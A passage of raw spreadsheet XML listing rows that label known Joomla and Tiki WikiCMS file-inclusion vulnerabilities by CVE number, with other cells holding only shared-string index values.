        <v>845</v>
      </c>
    </row>
    <row r="250" s="4" customFormat="1" spans="1:6">
      <c r="A250" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B250" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C250" s="2" t="s">
        <v>846</v>
      </c>
      <c r="D250" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-4617</v>
      </c>
      <c r="E250" s="6" t="s">
        <v>847</v>
      </c>
      <c r="F250" s="4" t="s">
        <v>848</v>
      </c>
    </row>
    <row r="251" s="4" customFormat="1" spans="1:6">
      <c r="A251" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B251" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C251" s="2" t="s">
        <v>849</v>
      </c>
      <c r="D251" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-3426</v>
      </c>
      <c r="E251" s="6" t="s">
        <v>850</v>
      </c>
      <c r="F251" s="4" t="s">
        <v>851</v>
      </c>
    </row>
    <row r="252" s="4" customFormat="1" spans="1:6">
      <c r="A252" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B252" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C252" s="2" t="s">
        <v>852</v>
      </c>
      <c r="D252" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-5286</v>
      </c>
      <c r="E252" s="6" t="s">
        <v>853</v>
      </c>
      <c r="F252" s="4" t="s">
        <v>854</v>
      </c>
    </row>
    <row r="253" s="4" customFormat="1" spans="1:6">
      <c r="A253" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B253" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C253" s="2" t="s">
        <v>855</v>
      </c>
      <c r="D253" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1352</v>
      </c>
      <c r="E253" s="6" t="s">
        <v>856</v>
      </c>
      <c r="F253" s="4" t="s">
        <v>857</v>
      </c>
    </row>
    <row r="254" s="4" customFormat="1" spans="1:6">
      <c r="A254" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B254" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C254" s="2" t="s">
        <v>858</v>
      </c>
      <c r="D254" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1353</v>
      </c>
      <c r="E254" s="6" t="s">
        <v>859</v>
      </c>
      <c r="F254" s="4" t="s">
        <v>860</v>
      </c>
    </row>
    <row r="255" s="4" customFormat="1" spans="1:6">
      <c r="A255" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B255" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C255" s="2" t="s">
        <v>861</v>
      </c>
      <c r="D255" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1957</v>
      </c>
      <c r="E255" s="6" t="s">
        <v>862</v>
      </c>
      <c r="F255" s="4" t="s">
        <v>863</v>
      </c>
    </row>
    <row r="256" s="4" customFormat="1" spans="1:6">
      <c r="A256" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B256" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C256" s="2" t="s">
        <v>864</v>
      </c>
      <c r="D256" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-1491</v>
      </c>
      <c r="E256" s="6" t="s">
        <v>865</v>
      </c>
      <c r="F256" s="4" t="s">
        <v>866</v>
      </c>
    </row>
    <row r="257" s="4" customFormat="1" spans="1:6">
      <c r="A257" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B257" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C257" s="2" t="s">
        <v>867</v>
      </c>
      <c r="D257" s="2" t="str">
        <f t="shared" si="3"/>
        <v>Joomla_任意文件包含_CVE-2010-2050</v>
      </c>
      <c r="E257" s="6" t="s">
        <v>868</v>
      </c>
      <c r="F257" s="4" t="s">
        <v>869</v>
      </c>
    </row>
    <row r="258" s="4" customFormat="1" spans="1:6">
      <c r="A258" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B258" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C258" s="2" t="s">
        <v>870</v>
      </c>
      <c r="D258" s="2" t="str">
        <f t="shared" ref="D258:D321" si="4">_xlfn.TEXTJOIN("_",TRUE,A258:C258)</f>
        <v>Joomla_任意文件包含_CVE-2010-1719</v>
      </c>
      <c r="E258" s="6" t="s">
        <v>871</v>
      </c>
      <c r="F258" s="4" t="s">
        <v>872</v>
      </c>
    </row>
    <row r="259" s="4" customFormat="1" spans="1:6">
      <c r="A259" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B259" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C259" s="2" t="s">
        <v>873</v>
      </c>
      <c r="D259" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1307</v>
      </c>
      <c r="E259" s="6" t="s">
        <v>874</v>
      </c>
      <c r="F259" s="4" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="260" s="4" customFormat="1" spans="1:6">
      <c r="A260" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B260" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C260" s="2" t="s">
        <v>876</v>
      </c>
      <c r="D260" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1495</v>
      </c>
      <c r="E260" s="6" t="s">
        <v>877</v>
      </c>
      <c r="F260" s="4" t="s">
        <v>878</v>
      </c>
    </row>
    <row r="261" s="4" customFormat="1" spans="1:6">
      <c r="A261" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B261" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C261" s="2" t="s">
        <v>879</v>
      </c>
      <c r="D261" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-2857</v>
      </c>
      <c r="E261" s="6" t="s">
        <v>880</v>
      </c>
      <c r="F261" s="4" t="s">
        <v>881</v>
      </c>
    </row>
    <row r="262" s="4" customFormat="1" spans="1:6">
      <c r="A262" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B262" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C262" s="2" t="s">
        <v>882</v>
      </c>
      <c r="D262" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1312</v>
      </c>
      <c r="E262" s="6" t="s">
        <v>883</v>
      </c>
      <c r="F262" s="4" t="s">
        <v>884</v>
      </c>
    </row>
    <row r="263" s="4" customFormat="1" spans="1:6">
      <c r="A263" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B263" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C263" s="2" t="s">
        <v>885</v>
      </c>
      <c r="D263" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1658</v>
      </c>
      <c r="E263" s="6" t="s">
        <v>886</v>
      </c>
      <c r="F263" s="4" t="s">
        <v>887</v>
      </c>
    </row>
    <row r="264" s="4" customFormat="1" spans="1:6">
      <c r="A264" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B264" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C264" s="2" t="s">
        <v>888</v>
      </c>
      <c r="D264" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1715</v>
      </c>
      <c r="E264" s="6" t="s">
        <v>889</v>
      </c>
      <c r="F264" s="4" t="s">
        <v>890</v>
      </c>
    </row>
    <row r="265" s="4" customFormat="1" spans="1:6">
      <c r="A265" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B265" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C265" s="2" t="s">
        <v>891</v>
      </c>
      <c r="D265" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1722</v>
      </c>
      <c r="E265" s="6" t="s">
        <v>892</v>
      </c>
      <c r="F265" s="4" t="s">
        <v>893</v>
      </c>
    </row>
    <row r="266" s="4" customFormat="1" spans="1:6">
      <c r="A266" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B266" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C266" s="2" t="s">
        <v>894</v>
      </c>
      <c r="D266" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1878</v>
      </c>
      <c r="E266" s="6" t="s">
        <v>895</v>
      </c>
      <c r="F266" s="4" t="s">
        <v>896</v>
      </c>
    </row>
    <row r="267" s="4" customFormat="1" spans="1:6">
      <c r="A267" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B267" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C267" s="2" t="s">
        <v>897</v>
      </c>
      <c r="D267" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1461</v>
      </c>
      <c r="E267" s="6" t="s">
        <v>898</v>
      </c>
      <c r="F267" s="4" t="s">
        <v>899</v>
      </c>
    </row>
    <row r="268" s="4" customFormat="1" spans="1:6">
      <c r="A268" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B268" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C268" s="2" t="s">
        <v>900</v>
      </c>
      <c r="D268" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1306</v>
      </c>
      <c r="E268" s="6" t="s">
        <v>901</v>
      </c>
      <c r="F268" s="4" t="s">
        <v>902</v>
      </c>
    </row>
    <row r="269" s="4" customFormat="1" spans="1:6">
      <c r="A269" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B269" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C269" s="2" t="s">
        <v>903</v>
      </c>
      <c r="D269" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1532</v>
      </c>
      <c r="E269" s="6" t="s">
        <v>904</v>
      </c>
      <c r="F269" s="4" t="s">
        <v>905</v>
      </c>
    </row>
    <row r="270" s="4" customFormat="1" spans="1:6">
      <c r="A270" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B270" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C270" s="2" t="s">
        <v>906</v>
      </c>
      <c r="D270" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1475</v>
      </c>
      <c r="E270" s="6" t="s">
        <v>907</v>
      </c>
      <c r="F270" s="4" t="s">
        <v>908</v>
      </c>
    </row>
    <row r="271" s="4" customFormat="1" spans="1:6">
      <c r="A271" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B271" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C271" s="2" t="s">
        <v>909</v>
      </c>
      <c r="D271" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1875</v>
      </c>
      <c r="E271" s="6" t="s">
        <v>910</v>
      </c>
      <c r="F271" s="4" t="s">
        <v>911</v>
      </c>
    </row>
    <row r="272" s="4" customFormat="1" spans="1:6">
      <c r="A272" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B272" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C272" s="2" t="s">
        <v>912</v>
      </c>
      <c r="D272" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-2682</v>
      </c>
      <c r="E272" s="6" t="s">
        <v>913</v>
      </c>
      <c r="F272" s="4" t="s">
        <v>914</v>
      </c>
    </row>
    <row r="273" s="4" customFormat="1" spans="1:6">
      <c r="A273" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B273" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C273" s="2" t="s">
        <v>915</v>
      </c>
      <c r="D273" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1858</v>
      </c>
      <c r="E273" s="6" t="s">
        <v>916</v>
      </c>
      <c r="F273" s="4" t="s">
        <v>917</v>
      </c>
    </row>
    <row r="274" s="4" customFormat="1" spans="1:6">
      <c r="A274" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B274" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C274" s="2" t="s">
        <v>918</v>
      </c>
      <c r="D274" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1308</v>
      </c>
      <c r="E274" s="6" t="s">
        <v>919</v>
      </c>
      <c r="F274" s="4" t="s">
        <v>920</v>
      </c>
    </row>
    <row r="275" s="4" customFormat="1" spans="1:6">
      <c r="A275" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B275" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C275" s="2" t="s">
        <v>921</v>
      </c>
      <c r="D275" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1313</v>
      </c>
      <c r="E275" s="6" t="s">
        <v>922</v>
      </c>
      <c r="F275" s="4" t="s">
        <v>923</v>
      </c>
    </row>
    <row r="276" s="4" customFormat="1" spans="1:6">
      <c r="A276" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B276" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C276" s="2" t="s">
        <v>924</v>
      </c>
      <c r="D276" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1534</v>
      </c>
      <c r="E276" s="6" t="s">
        <v>925</v>
      </c>
      <c r="F276" s="4" t="s">
        <v>926</v>
      </c>
    </row>
    <row r="277" s="4" customFormat="1" spans="1:6">
      <c r="A277" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B277" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C277" s="2" t="s">
        <v>927</v>
      </c>
      <c r="D277" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1657</v>
      </c>
      <c r="E277" s="6" t="s">
        <v>928</v>
      </c>
      <c r="F277" s="4" t="s">
        <v>929</v>
      </c>
    </row>
    <row r="278" s="4" customFormat="1" spans="1:6">
      <c r="A278" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B278" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C278" s="2" t="s">
        <v>930</v>
      </c>
      <c r="D278" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1474</v>
      </c>
      <c r="E278" s="6" t="s">
        <v>931</v>
      </c>
      <c r="F278" s="4" t="s">
        <v>932</v>
      </c>
    </row>
    <row r="279" s="4" customFormat="1" spans="1:6">
      <c r="A279" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B279" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C279" s="2" t="s">
        <v>933</v>
      </c>
      <c r="D279" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1535</v>
      </c>
      <c r="E279" s="6" t="s">
        <v>934</v>
      </c>
      <c r="F279" s="4" t="s">
        <v>935</v>
      </c>
    </row>
    <row r="280" s="4" customFormat="1" spans="1:6">
      <c r="A280" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B280" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C280" s="2" t="s">
        <v>936</v>
      </c>
      <c r="D280" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1533</v>
      </c>
      <c r="E280" s="6" t="s">
        <v>937</v>
      </c>
      <c r="F280" s="4" t="s">
        <v>938</v>
      </c>
    </row>
    <row r="281" s="4" customFormat="1" spans="1:6">
      <c r="A281" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B281" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C281" s="2" t="s">
        <v>939</v>
      </c>
      <c r="D281" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1659</v>
      </c>
      <c r="E281" s="6" t="s">
        <v>940</v>
      </c>
      <c r="F281" s="4" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="282" s="4" customFormat="1" spans="1:6">
      <c r="A282" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B282" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C282" s="2" t="s">
        <v>942</v>
      </c>
      <c r="D282" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1304</v>
      </c>
      <c r="E282" s="6" t="s">
        <v>943</v>
      </c>
      <c r="F282" s="4" t="s">
        <v>944</v>
      </c>
    </row>
    <row r="283" s="4" customFormat="1" spans="1:6">
      <c r="A283" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B283" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C283" s="2" t="s">
        <v>945</v>
      </c>
      <c r="D283" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1354</v>
      </c>
      <c r="E283" s="6" t="s">
        <v>946</v>
      </c>
      <c r="F283" s="4" t="s">
        <v>947</v>
      </c>
    </row>
    <row r="284" s="4" customFormat="1" spans="1:6">
      <c r="A284" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B284" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C284" s="2" t="s">
        <v>948</v>
      </c>
      <c r="D284" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-2918</v>
      </c>
      <c r="E284" s="6" t="s">
        <v>949</v>
      </c>
      <c r="F284" s="4" t="s">
        <v>950</v>
      </c>
    </row>
    <row r="285" s="4" customFormat="1" spans="1:6">
      <c r="A285" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B285" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C285" s="2" t="s">
        <v>951</v>
      </c>
      <c r="D285" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1607</v>
      </c>
      <c r="E285" s="6" t="s">
        <v>952</v>
      </c>
      <c r="F285" s="4" t="s">
        <v>953</v>
      </c>
    </row>
    <row r="286" s="4" customFormat="1" spans="1:6">
      <c r="A286" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B286" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C286" s="2" t="s">
        <v>954</v>
      </c>
      <c r="D286" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1470</v>
      </c>
      <c r="E286" s="6" t="s">
        <v>955</v>
      </c>
      <c r="F286" s="4" t="s">
        <v>956</v>
      </c>
    </row>
    <row r="287" s="4" customFormat="1" spans="1:6">
      <c r="A287" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B287" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C287" s="2" t="s">
        <v>957</v>
      </c>
      <c r="D287" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1602</v>
      </c>
      <c r="E287" s="6" t="s">
        <v>958</v>
      </c>
      <c r="F287" s="4" t="s">
        <v>959</v>
      </c>
    </row>
    <row r="288" s="4" customFormat="1" spans="1:6">
      <c r="A288" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B288" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C288" s="2" t="s">
        <v>960</v>
      </c>
      <c r="D288" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1603</v>
      </c>
      <c r="E288" s="6" t="s">
        <v>961</v>
      </c>
      <c r="F288" s="4" t="s">
        <v>962</v>
      </c>
    </row>
    <row r="289" s="4" customFormat="1" spans="1:6">
      <c r="A289" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B289" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C289" s="2" t="s">
        <v>963</v>
      </c>
      <c r="D289" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-0985</v>
      </c>
      <c r="E289" s="6" t="s">
        <v>964</v>
      </c>
      <c r="F289" s="4" t="s">
        <v>965</v>
      </c>
    </row>
    <row r="290" s="4" customFormat="1" spans="1:6">
      <c r="A290" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B290" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C290" s="2" t="s">
        <v>966</v>
      </c>
      <c r="D290" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-2259</v>
      </c>
      <c r="E290" s="6" t="s">
        <v>967</v>
      </c>
      <c r="F290" s="4" t="s">
        <v>968</v>
      </c>
    </row>
    <row r="291" s="4" customFormat="1" spans="1:6">
      <c r="A291" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B291" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C291" s="2" t="s">
        <v>969</v>
      </c>
      <c r="D291" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-0157</v>
      </c>
      <c r="E291" s="6" t="s">
        <v>970</v>
      </c>
      <c r="F291" s="4" t="s">
        <v>971</v>
      </c>
    </row>
    <row r="292" s="4" customFormat="1" spans="1:6">
      <c r="A292" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B292" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C292" s="2" t="s">
        <v>972</v>
      </c>
      <c r="D292" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-0982</v>
      </c>
      <c r="E292" s="6" t="s">
        <v>973</v>
      </c>
      <c r="F292" s="4" t="s">
        <v>974</v>
      </c>
    </row>
    <row r="293" s="4" customFormat="1" spans="1:6">
      <c r="A293" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B293" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C293" s="2" t="s">
        <v>975</v>
      </c>
      <c r="D293" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1081</v>
      </c>
      <c r="E293" s="6" t="s">
        <v>976</v>
      </c>
      <c r="F293" s="4" t="s">
        <v>977</v>
      </c>
    </row>
    <row r="294" s="4" customFormat="1" spans="1:6">
      <c r="A294" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B294" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C294" s="2" t="s">
        <v>978</v>
      </c>
      <c r="D294" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-0972</v>
      </c>
      <c r="E294" s="6" t="s">
        <v>979</v>
      </c>
      <c r="F294" s="4" t="s">
        <v>980</v>
      </c>
    </row>
    <row r="295" s="4" customFormat="1" spans="1:6">
      <c r="A295" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B295" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C295" s="2" t="s">
        <v>981</v>
      </c>
      <c r="D295" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1219</v>
      </c>
      <c r="E295" s="6" t="s">
        <v>982</v>
      </c>
      <c r="F295" s="4" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="296" s="4" customFormat="1" spans="1:6">
      <c r="A296" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B296" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C296" s="2" t="s">
        <v>984</v>
      </c>
      <c r="D296" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1340</v>
      </c>
      <c r="E296" s="6" t="s">
        <v>985</v>
      </c>
      <c r="F296" s="4" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="297" s="4" customFormat="1" spans="1:6">
      <c r="A297" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B297" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C297" s="2" t="s">
        <v>987</v>
      </c>
      <c r="D297" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1056</v>
      </c>
      <c r="E297" s="6" t="s">
        <v>988</v>
      </c>
      <c r="F297" s="4" t="s">
        <v>989</v>
      </c>
    </row>
    <row r="298" s="4" customFormat="1" spans="1:6">
      <c r="A298" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B298" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C298" s="2" t="s">
        <v>990</v>
      </c>
      <c r="D298" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1717</v>
      </c>
      <c r="E298" s="6" t="s">
        <v>991</v>
      </c>
      <c r="F298" s="4" t="s">
        <v>992</v>
      </c>
    </row>
    <row r="299" s="4" customFormat="1" spans="1:6">
      <c r="A299" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B299" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C299" s="2" t="s">
        <v>993</v>
      </c>
      <c r="D299" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1723</v>
      </c>
      <c r="E299" s="6" t="s">
        <v>994</v>
      </c>
      <c r="F299" s="4" t="s">
        <v>995</v>
      </c>
    </row>
    <row r="300" s="4" customFormat="1" spans="1:6">
      <c r="A300" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B300" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C300" s="2" t="s">
        <v>996</v>
      </c>
      <c r="D300" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1953</v>
      </c>
      <c r="E300" s="6" t="s">
        <v>997</v>
      </c>
      <c r="F300" s="4" t="s">
        <v>998</v>
      </c>
    </row>
    <row r="301" s="4" customFormat="1" spans="1:6">
      <c r="A301" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B301" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C301" s="2" t="s">
        <v>999</v>
      </c>
      <c r="D301" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1954</v>
      </c>
      <c r="E301" s="6" t="s">
        <v>1000</v>
      </c>
      <c r="F301" s="4" t="s">
        <v>1001</v>
      </c>
    </row>
    <row r="302" s="4" customFormat="1" spans="1:6">
      <c r="A302" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B302" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C302" s="2" t="s">
        <v>1002</v>
      </c>
      <c r="D302" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-2680</v>
      </c>
      <c r="E302" s="6" t="s">
        <v>1003</v>
      </c>
      <c r="F302" s="4" t="s">
        <v>1004</v>
      </c>
    </row>
    <row r="303" s="4" customFormat="1" spans="1:6">
      <c r="A303" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B303" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C303" s="2" t="s">
        <v>1005</v>
      </c>
      <c r="D303" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1531</v>
      </c>
      <c r="E303" s="6" t="s">
        <v>1006</v>
      </c>
      <c r="F303" s="4" t="s">
        <v>1007</v>
      </c>
    </row>
    <row r="304" s="4" customFormat="1" spans="1:6">
      <c r="A304" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B304" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C304" s="2" t="s">
        <v>1008</v>
      </c>
      <c r="D304" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1983</v>
      </c>
      <c r="E304" s="6" t="s">
        <v>1009</v>
      </c>
      <c r="F304" s="4" t="s">
        <v>1010</v>
      </c>
    </row>
    <row r="305" s="4" customFormat="1" spans="1:6">
      <c r="A305" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B305" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C305" s="2" t="s">
        <v>1011</v>
      </c>
      <c r="D305" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-1315</v>
      </c>
      <c r="E305" s="6" t="s">
        <v>1012</v>
      </c>
      <c r="F305" s="4" t="s">
        <v>1013</v>
      </c>
    </row>
    <row r="306" s="4" customFormat="1" spans="1:6">
      <c r="A306" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B306" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C306" s="2" t="s">
        <v>1014</v>
      </c>
      <c r="D306" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-2033</v>
      </c>
      <c r="E306" s="6" t="s">
        <v>1015</v>
      </c>
      <c r="F306" s="4" t="s">
        <v>1016</v>
      </c>
    </row>
    <row r="307" s="4" customFormat="1" spans="1:6">
      <c r="A307" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B307" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C307" s="2" t="s">
        <v>1017</v>
      </c>
      <c r="D307" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Joomla_任意文件包含_CVE-2010-0759</v>
      </c>
      <c r="E307" s="6" t="s">
        <v>1018</v>
      </c>
      <c r="F307" s="4" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="308" s="4" customFormat="1" spans="1:6">
      <c r="A308" s="2" t="s">
        <v>340</v>
      </c>
      <c r="B308" s="2" t="s">
        <v>683</v>
      </c>
      <c r="C308" s="2" t="s">
        <v>1020</v>
      </c>
      <c r="D308" s="2" t="str">
        <f t="shared" si="4"/>
        <v>Tiki WikiCMS_任意文件包含_CVE-2010-4239</v>
      </c>
      <c r="E308" s="6" t="s">
        <v>1021</v>
      </c>
      <c r="F308" s="4" t="s">
        <v>1022</v>
      </c>
    </row>
    <row r="309" s="4" customFormat="1" spans="1:6">
      <c r="A309" s="2" t="s">
